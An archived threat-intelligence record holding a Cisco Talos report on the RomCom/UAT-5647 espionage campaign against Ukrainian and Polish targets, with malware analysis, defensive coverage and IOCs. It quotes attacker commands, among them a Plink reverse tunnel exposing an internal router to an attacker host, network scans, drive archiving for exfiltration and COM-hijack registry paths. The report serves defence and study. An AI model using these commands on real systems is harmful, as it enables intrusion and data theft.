{ "id": "314848ec-d777-40ed-9b1e-b06b6cbd6408", "created_at": "2026-04-06T00:08:21.413908Z", "updated_at": "2026-04-10T03:26:22.923466Z", "deleted_at": null, "sha1_hash": "a398676fe283fb830f072ac459612abd9191c35b", "title": "UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 211419, "plain_text": "UAT-5647 targets Ukrainian and Polish entities with RomCom\r\nmalware variants\r\nBy Dmytro Korzhevin\r\nPublished: 2024-10-17 · Archived: 2026-04-05 16:50:48 UTC\r\nCisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian speaking\r\ngroup we track as “UAT-5647”, against Ukrainian government entities and unknown Polish entities. \r\nUAT-5647 is also known as  RomCom and is widely attributed to Russian speaking threat actors in open-source reporting.  \r\nThe latest series of attacks deploys an updated version of the RomCom malware we track as\r\n“SingleCamper”. This version is loaded directly from registry into memory and uses loopback address to\r\ncommunicate with its loader.\r\nUAT-5647 has also evolved their tooling to include four distinct malware families: two downloaders we\r\ntrack as RustClaw and MeltingClaw; a RUST-based backdoor we call DustyHammock; and a C++ based\r\nbackdoor we call ShadyHammock.\r\nDuring its lateral movement, the threat actor attempted to compromise edge devices by tunneling internal\r\ninterfaces to external, remote hosts controlled by UAT-5647. If successful, it would have higher chances of\r\nevading detection during the incident response process. \r\nUAT-5647 has long been considered a multi-motivational threat actor performing both ransomware and espionage-oriented attacks. However, UAT-5647 has accelerated their attacks in recent months with a clear focus on\r\nestablishing long–term access for exfiltrating data of strategic interest to them. Our assessment, in line with recent\r\nreporting from CERT-UA and Palo Alto Networks, indicates that the threat actor is aggressively expanding their\r\ntooling and infrastructure to support a wide variety of malware components authored in diverse languages and\r\nplatforms such as GoLang, C++, RUST and LUA.  \r\nTalos further assesses that this specific series of attacks, targeting high profile Ukrainian entities, is likely meant to\r\nserve UAT-5647's two-pronged strategy in a staged manner – establish long-term access and exfiltrate data for as\r\nlong as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt\r\nand likely financially gain from the compromise. It is also likely that Polish entities were also targeted, based on\r\nthe keyboard language checks performed by the malware.\r\nUAT-5647 infection chain \r\nThe infection chain consists of a spear-phishing message delivering a downloader consisting of either of two\r\nvariants: “RustyClaw” – a RUST-based downloader, and a C++ based variant we track as “MeltingClaw”. The\r\ndownloaders make way for and establish persistence for two distinct backdoors we call “DustyHammock” and\r\n“ShadyHammock,” respectively.  \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 1 of 13\n\nDustyHammock is a more straightforward backdoor meant to be the core malicious component of the infection\r\ncommunicating with its command and control (C2) and performing malicious actions. ShadyHammock is,\r\nhowever, a two-pronged backdoor responsible for loading and activating the SingleCamper implant (RomCom\r\nmalware variant) on an infected system and optionally listening for incoming commands from another malicious\r\ncomponent. \r\nThe overall infection chain can be visualized as: \r\nUAT-5647's post-compromise activity \r\nThe post-compromise activity by UAT-5647 is standard to what we would expect for a threat actor whose primary\r\nmotivation is espionage. There is however one set of actions that stand out. It is our assessment that at some point\r\nthe threat actor started targeting the edge devices, from inside the compromised network. This and other activities\r\nare detailed in the following sub-sections. \r\nTunneling into the enterprise \r\nOnce preliminary network reconnaissance was completed, UAT-5647 downloaded PuTTY’s Plink tool to establish\r\nremote tunnels between accessible endpoints and attacker-controlled servers [T1572]. While this is a common\r\npractice, one of the configurations was mapping the internal admin port of an edge device.\r\ncmd /C %public%\\pictures\\iestatus[.]exe -pw _passwd_ -batch -hostkey SHA256:_KEY_ -N -R 8080:_IP_IN_I\r\n \r\nAny traffic sent to Port 8088 on the attacker-controlled remote server will be forwarded to Port 80 on\r\n(\u003cIP_IN_INFECTED_NETWORK\u003e). This technique effectively exposes the application on Port 80 to the\r\nattackers allowing them to: \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 2 of 13\n\nBrute force or password spray to gain access to the service. \r\nMonitor and exfiltrate data and configuration from the application once access has been achieved. \r\nBased on URLs exposed to the threat actors now on Port 8088 such as\r\n“hxxp[://]193[.]42[.]36[.]131:8088/help/LanArpBindingListHelpRpm[.]htm”, “userRpm/VirtualServerRpm.htm”,\r\nand Censys data, it is likely that the \u003cIP_IN_INFECTED_NETWORK\u003e IP address is a “TP-LINK Wireless G\r\nRouter WR340G”.\r\nUAT-5647’s lateral movement and system discovery \r\nThe threat actors were particularly interested in network reconnaissance, evident from the repeated ping sweeps\r\nthey carried out to find adjoining systems [T1016]: \r\npowershell command 1..254 | % {ping n 1 a w 100 192.168.0.$_} | SelectString \\[\r\nOnce UAT-5647 deemed a specific system on the network as interesting, they can take one of two actions: \r\nBased on the results of the ping sweep (ICMP sweep), UAT-5647 created and executed a customized batch (BAT)\r\nfile named “nv[.]bat”. The BAT file is used to run “net view” to obtain a list of shares exposed on specific IPs\r\n[T1135]:  \r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nUAT-5647 further pinged additional endpoints in the network, this time however using their hostnames and\r\nspecific IPs [T1016]: \r\nping -n 1 \u003cIP\u003e\r\nping -n 1 \u003chostname\u003e\r\nA successful response from the system leads to shared folder reconnaissance [T1135]: \r\ndir [\\][\\]192[.]168[.]0[.]XXX\\c$\r\ndir [\\][\\]\u003chostname\u003e\\c$\r\nThey began to run highly specific port scans on it, likely to find means of obtaining unauthorized access to it: \r\npowershell -c $ips = @(\"\u003cIP_ADDRESS\u003e”); $ports = @(\"22\", \"80\", \"443\"); foreach ($ip in $ips) { forea\r\nLater the threat actor expanded their port scans to other IP address in the network: \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 3 of 13\n\npowershell -Command $ips = @(\" \u003cIP_ADDRESS\u003e\", \"\u003cIP_ADDRESS\u003e\", ...., \"\u003cIP_ADDRESS\u003e\", \"\u003cIP_ADDRESS\u003e\");\r\nSystem and user discovery \r\nEven though the C2 may have automatically issued a limited set of commands to the last-stage implants, the\r\nattackers open a reverse shell (via cmd[.]exe) to conduct further reconnaissance. This activity primarily consists of\r\nuser and system discovery tasks:\r\nCommands  MITRE ATT\u0026CK Technique \r\nwhoami \r\nwhoami /all \r\nSystem Owner/User Discovery [T1003] \r\nchcp \r\nSystem Location Discovery: System\r\nLanguage Discovery [T1614/001] \r\nsysteminfo \r\nipconfig /all \r\npowershell -c get-volume \r\ntasklist \r\narp -a \r\nnet user \r\ntasklist /v \r\nnetstat -ano \r\nSystem Information Discovery [T1082] \r\nnltest /domain_trusts  Domain Trust Discovery [T1482] \r\ndir C:\\Program Files \r\ndir C:\\Users \r\ndir %userprofile% \r\nFile and Directory Discovery [T1083] \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 4 of 13\n\ndir %userprofile%\\Downloads \r\ndir %userprofile%\\Desktop \r\ndir %userprofile%\\Documents \r\ndir %localappdata% \r\ndir /s C:\\ProgramData \r\ndir %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\ \r\ndir %localappdata% \r\ndir c:\\users \r\ndir %public% \r\nnet localgroup \r\nnet localgroup administrators \r\nnet share \r\nPermission Groups Discovery: Local\r\nGroups [T1069/001] \r\ncmd /C reg export hkcu %public%\\music\\hkcu.txt \r\ncmd /C reg export hklm %public%\\pictures\\hklm.txt \r\ncmd /C reg query hklm\\software \r\ncmd /C reg query hklm\\software\\product_name\u003e \r\ncmd /C reg query hklm\\SYSTEM\\CurrentControlSet\\Services\\\r\n\u003cproduct_name\u003e /s \r\nQuery Registry [T1012] \r\nData exfiltration activity \r\nIn parallel, we also observed the operators attempting to stage entire drives for exfiltration from the infected\r\nsystem [T1560]: \r\npowershell -c Compress-Archive -Path d:\\ -DestinationPath C:\\Users\\\u003cuser\u003e\\Documents\\d.zip\r\nHowever, they also collected specific folders on disk too. In this specific case the threat actor is exfiltrating the\r\n“Recent” folder in, what seems, an attempt to understand the victim’s latest activity on the system. \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 5 of 13\n\ncmd /C powershell -c Compress-Archive -Path c:\\users\\\u003cusers\u003e\\appdata\\Roaming\\microsoft\\Windows\\Recent\r\nRustyClaw leads to DustyHammock \r\nRustyClaw is a RUST-based malware downloader that is targeted towards Polish, Ukrainian or Russian speaking\r\nusers. The malware checks the Keyboard Layout to match one of the following language codes, before proceeding\r\nwith its malicious activities: \r\n415 – Polish \r\n422 – Ukrainian \r\n419 – Russian \r\n2000 – Unknown \r\nRustyClaw will then generate a hash for its file name to match it with a hardcoded value – this is an anti-analysis\r\nfeature to prevent malware from running in sandboxes with randomized names. \r\nOnce the checks have passed, the downloader will optionally download a decoy PDF to display to the infected\r\nuser and then download the next-stage implant, DustyHammock, to locations on disk such as: \r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\KeyStore\\keyprov.dll \r\nThen the following registry values are set to the path of the next-stage payload (keyprov[.]dll): \r\nHKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32 \r\nThis GUID is the CLISD for “CLSID_LocalIconCache”, that is the ThumbCache entry. It is used by\r\nexplorer[.]exe while rendering the thumbnails for file icons. \r\nThe downloader will then restart the explorer[.]exe process to load the next-stage payload DLL, DustyHammock,\r\neffectively trojanizing the process: \r\ncmd /C timeout 3 \u0026\u0026 taskkill /f /im explorer.exe \u0026\u0026 start explorer.exe \r\nDustyHammock – UAT-5647's latest backdoor \r\nDustyHammock is another RUST-based backdoor. It is configured to run preliminary, hardcoded, reconnaissance\r\ncommands on the infected system, gather their outputs, and send the information to its C2. The C2 then begins\r\nresponding with tasks to perform on the infected system. The preliminary information collected is the MAC\r\naddresses, windows version information, and computer\\username via the “whoami” and “chcp” commands. \r\nThe backdoor has the following capabilities: \r\nRun arbitrary commands on the infected endpoint. \r\nDownload and place files from the C2 to the infected system. \r\nConnect to an IPNS CID – likely done to download additional payloads to the infected system. The CID\r\naccess by the backdoor is\r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 6 of 13\n\n“/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm”. \r\nInterPlanetary File System (IPFS) is a peer-to-peer network allowing resource hosting in a decentralized manner.\r\nInterPlanetary Name System (IPNS), a feature of IPFS, enables mutable referencing of resources hosted on IPFS\r\nnetworks, allowing uploaders to modify the content of the resource without changing its identifier (CID). \r\n Note that although similar in names, DustyHammock and ShadyHammock are in fact distinct implant families.\r\nShadyHammock is coded in C++ and contains additional capabilities to bind itself and listen for incoming\r\nrequests – a capability missing in DustyHammock. Although ShadyHammock consists of more features,\r\nDustyHammock seems to be the successor to it and was used as recently as September 2024 by UAT-5647. UAT-5647 likely decided to abandon additional components such as SingleCamper (loaded by ShadyHammock) in\r\nfavor of a single last-stage implant, DustyHammock. \r\nMeltingClaw leads to ShadyHammock \r\nMeltingClaw is the second malware downloader UAT-5647 has used in this series of attacks. It is similar in\r\nbehavior to RustyClaw with varying configurations such as file names and locations. The next-stage payload,\r\nShadyHammock, is dropped to a similar location such as: \r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\AppTemp\\libapi.dll \r\nThis DLL is loaded into explorer[.]exe by specifying it in the registry key: \r\nHKEY_USERS\\S-1-..-CLASSES\\CLSID\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}\\InprocServer32\\ \r\nThis GUID is the “Sync Registration” COM interface and is loaded into explorer[.]exe as well. \r\n Apart from these capabilities that are common with RustyClaw, MeltingClaw will also download and store\r\nadditional payloads in the Windows registry: \r\nHKEY_CURRENT_USER\\Software\\AppDataSoft\\Software\\ \r\nXOR encoded SingleCamper DLL \r\nXOR encoded malware DLL – currently unknow. \r\nThe implant version for the downloader. \r\n“UPDE\u003cnumber\u003e” \r\nThese payloads are then loaded and activated by ShadyHammock via explorer[.]exe as illustrated next. One of the\r\npayloads is a new variant of the RomCom backdoor, we track as “SingleCamper”. The other payload is currently\r\nunknown. \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 7 of 13\n\nShadyHammock – a two-pronged backdoor \r\nShadyHammock is a simple and effective backdoor that carries out two primary tasks: \r\nLoad and run payloads placed in certain registry locations (by its parent MeltingClaw). \r\nBind to localhost and listen for incoming commands from a separate malicious component. \r\nShadyHammock’s load-and-run capability leads to SingleCamper \r\nThe malware will read registry locations, specifically in location: \r\nHKEY_CURRENT_USER\\Software\\AppDataSoft\\Software\\ \r\nThere are usually three values in this registry key, two containing encoded copies of next stage payloads and the\r\nthird containing configuration specific data such as the implant’s versions. \r\nThe binary content of these registry values is read and decoded, resulting in a DLL that is simply traversed to find\r\nthe export function. The resulting DLLs are loaded into memory to carry out more malicious activities. So far\r\nTalos has only discovered one DLL-based payload from registry, that we track as “SingleCamper”.\r\nSingleCamper, a new version of the RomCom malware, was also recently disclosed in Palo Alto’s report as\r\nSnipBot.  \r\nThe other payload is yet to be discovered (usually in the “trem2” or “state2” registry values). However,\r\nShadyHammock already has the capability to deploy this payload on-demand provided that a specific command\r\ncode is sent to it via the endpoint’s localhost interface. \r\nShadyHammock can accept commands from SingleCamper \r\nShadyHammock also consists of the ability to bind to a specific port (such as 1342) on localhost (127[.]0[.]0[.]1).\r\nBinding to localhost does not allow it to listen for incoming requests from remote hosts and is a mechanism to\r\ncommunicate with SingleCamper. \r\nShadyHammock listening on Port 1342 \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 8 of 13\n\nShadyHammock will listen for specific command phrases based on which it performs specific actions. These\r\nactions consist of: \r\n“delete bot”: Issuing this command will result in the backdoor being deleted from the infected host. The\r\nbackdoor will delete all registry keys and folders associated with it and then restart explorer[.]exe to\r\nexecute a benign, non-trojanized copy of the process. \r\n“update bot work” or “start bot file”: these commands instruct the backdoor to decode and load the\r\npayload stored in the second registry value that may have been created by MeltingClaw - “trem2” or\r\n“state2”. \r\nThese commands are in fact issued to ShadyHammock by SingleCamper (RomCom). SingleCamper’s C2 server\r\nwill issue a specific command code to it based on which the malware will generate the command phrase such as\r\n“delete bot” and send it to ShadyHammock via the localhost interface. \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 9 of 13\n\nSingleCamper issuing commands to ShadyHammock via localhost \r\nSingleCamper – an update to RomCom \r\nSingleCamper is the key implant in this infection that carries out all of the malicious post-compromise activities.\r\nIt is loaded by ShadyHammock after being read and decoded from the Windows registry. \r\nSingleCamper consists of the following capabilities: \r\nSend preliminary system information to the C2 for registering the infection. The data is sent over Port 443\r\n (HTTPS) in format: \r\n\u003cMAC_ADDRESS\u003e@RDPE1@@exist:\u003cBLAH\u003e-0:US:RDPE1:\\:\u003cOEM_CP_VALUE\u003e: \r\nExecute preliminary reconnaissance commands sent by the C2 and respond with the results such as: \r\nnltest /domain_trusts \r\nsysteminfo \r\nipconfig /all \r\ndir C:\\\"program Files\" C:\\\"Program Files (x86)\" C:\\Users \r\nBased on the information received by the C2, the attackers decided whether the infected system is worth\r\nexploring further and carrying out post-compromise activities. Therefore, any commands executed by\r\nSingleCamper after these preliminary commands may be human operator issued commands. \r\nReceive command codes and accompanying data from the C2 and perform malicious actions on the\r\ninfected system such as system information, download of additional payloads (such as PuTTY’s Plink),\r\nenumerate processes, enumerate and exfiltrate files with specific extensions such as: txt, rtf, xls, xlsx, ods,\r\ncmd, pdf, vbs, ps1, one, kdb, kdbx, doc, docx, odt, eml, msg, email. \r\nSingleCamper can also send commands to its loader, ShadyHammock, to perform actions on the infected\r\nendpoint. Actions include deleting the infection and loading another payload from registry – the same way\r\nShadyHammock loads SingleCamper. \r\nCoverage \r\nWays our customers can detect and block this threat are listed below. \r\n Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.  \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 10 of 13\n\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.  \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.  \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.  \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.  \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.  \r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.  \r\n Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.  \r\n Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.  \r\nIOCs \r\nIOCs for this research can also be found at our GitHub repository here. \r\nRustyClaw \r\n12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9 \r\n260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd \r\n9062d0f5f788bec4b487faf5f9b4bb450557e178ba114324ef7056a22b3fbe8b \r\n43a15c4ee10787997682b79a54ac49a90d26a126f5eeeb8569022850a2b96057 \r\naa09e9dca4994404a5f654be2a051c46f8799b0e987bcefef2b52412ac402105 \r\n585ed48d4c0289ce66db669393889482ec29236dc3d04827604cf778c79fda36 \r\n62f59766e62c7bd519621ba74f4d0ad122cca82179d022596b38bd76c7a430c4 \r\n9fd5dee828c69e190e46763b818b1a14f147d1469dc577a99b759403a9dadf04 \r\nb1fe8fbbb0b6de0f1dcd4146d674a71c511488a9eb4538689294bd782df040df \r\n7602e2c1ae27e1b36ee4aed357e505f14496f63db29fb4fcdd0d8a9db067a5c4 \r\nf3fe04a7e8da68dc05acb7164b402ffc6675a478972cf624de84b3e2e4945b93 \r\n10e1d453d4f9ca05ff6af3dcd7766a17ca1470ee89ba90feee5d52f8d2b18a4c \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 11 of 13\n\na265ae8fed205efb5bcc2fb59e60f743f45b7ad402cb827bc98dee397069830c \r\n8104fdf9ff6be096b7e5011e362400ee8dd89d829c608be21eb1de959404b4b9 \r\nb55f70467f13fbad6dde354d8653d1d6180788569496a50b06f2ece1f57a5e91 \r\nbd25618f382fc032016e8c9bc61f0bc24993a06baf925d987dcec4881108ea2a \r\n78eaaf3d831df27a5bc4377536e73606cd84a89ea2da725f5d381536d5d920d8 \r\n88a4b39fb0466ef9af2dcd49139eaff18309b32231a762b57ff9f778cc3d2dd7 \r\n01ebc558aa7028723bebd8301fd110d01cbd66d9a8b04685afd4f04f76e7b80c \r\n7c9775b0f44419207b02e531c357fe02f5856c17dbd88b3f32ec748047014df8 \r\n54ce280ec0f086d89ee338029f12cef8e1297ee740af76dda245a08cb91bab4d \r\nbf5f2bdc3d2acbfb218192710c8d27133bf51c1da1a778244617d3ba9c20e6f7 \r\nfdbc6648c6f922ffcd2b351791099e893e183680fc86f48bf18815d8ae98a4f7 \r\nac9e3bf1cc87bc86318b258498572793d9fb082417e3f2ff17050cf6ec1d0bb5 \r\n0a02901d364dc9d70b8fcdc8a2ec120b14f3c393186f99e2e4c5317db1edc889\r\nDustyHammock \r\n951b89f25f7d8be0619b1dfdcc63939b0792b63fa34ebfa9010f0055d009a2d3 \r\nPuTTY Plink \r\n2e338a447b4ceaa00b99d742194d174243ca82830a03149028f9713d71fe9aab \r\nMeltingClaw \r\n45adf6f32f9b3c398ee27f02427a55bb3df74687e378edcb7e23caf6a6f7bf2a \r\nB9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045\r\nShadyHammock \r\nce8b46370fd72d7684ad6ade16f868ac19f03b85e35317025511d6eeee288c64 \r\n9f635fa106dbe7181b4162266379703b3fdf53408e5b8faa6aeee08f1965d3a2 \r\n1fa96e7f3c26743295a6af7917837c98c1d6ac0da30a804fed820daace6f90b0\r\nSingleCamper \r\ndee849e0170184d3773077a9e7ce63d2b767bb19e85441d9c55ee44d6f129df9\r\n2474a6c6b3df3f1ac4eadcb8b2c70db289c066ec4b284ac632354e9dbe488e4d\r\nNetwork IOCs \r\n213[.]139[.]205[.]23 \r\ndnsresolver[.]online \r\napisolving[.]com \r\nhxxp[://]apisolving[.]com:443/DKgitTDJfiP \r\nrdcservice[.]org \r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 12 of 13\n\n23[.]94[.]207[.]116 \r\nwebtimeapi[.]com \r\n91[.]92[.]242[.]87 \r\nwirelesszone[.]top \r\nhxxp[://]wirelesszone[.]top:433/OfjdDebdjas \r\n192[.]227[.]190[.]127 \r\ndevhubs[.]dev \r\n91[.]92[.]254[.]218 \r\npos-st[.]top \r\nhxxp[://]adcreative[.]pictures:443/kjLY1Ul8IMO \r\nadcreative[.]pictures \r\n91[.]92[.]248[.]75 \r\ncreativeadb[.]com \r\n94[.]156[.]68[.]216 \r\nhxxp[://]creativeadb[.]com:443/n9JTcP62OvC \r\n193[.]42[.]36[.]131 \r\ncopdaemi[.]top \r\nadbefnts[.]dev \r\n23[.]137[.]253[.]43 \r\nstore-images[.]org \r\n193[.]42[.]36[.]132 \r\n/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm\r\nSource: https://blog.talosintelligence.com/uat-5647-romcom/\r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/uat-5647-romcom/" ], "report_names": [ "uat-5647-romcom" ], "threat_actors": [ { "id": "555e2cac-931d-4ad4-8eaa-64df6451059d", "created_at": "2023-01-06T13:46:39.48103Z", "updated_at": "2026-04-10T02:00:03.342729Z", "deleted_at": null, "main_name": "RomCom", "aliases": [ "UAT-5647", "Storm-0978" ], "source_name": "MISPGALAXY:RomCom", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d58052ba-978b-4775-985a-26ed8e64f98c", "created_at": "2023-09-07T02:02:48.069895Z", "updated_at": "2026-04-10T02:00:04.946879Z", "deleted_at": null, "main_name": "Tropical Scorpius", "aliases": [ "DEV-0978", "RomCom", "Storm-0671", "Storm-0978", "TA829", "Tropical Scorpius", "UAC-0180", "UNC2596", "Void Rabisu" ], "source_name": "ETDA:Tropical Scorpius", "tools": [ "COLDDRAW", "Cuba", "Industrial Spy", "PEAPOD", "ROMCOM", "ROMCOM RAT", "SingleCamper", "SnipBot" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434101, "ts_updated_at": 1775791582, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a398676fe283fb830f072ac459612abd9191c35b.pdf", "text": "https://archive.orkl.eu/a398676fe283fb830f072ac459612abd9191c35b.txt", "img": "https://archive.orkl.eu/a398676fe283fb830f072ac459612abd9191c35b.jpg" } }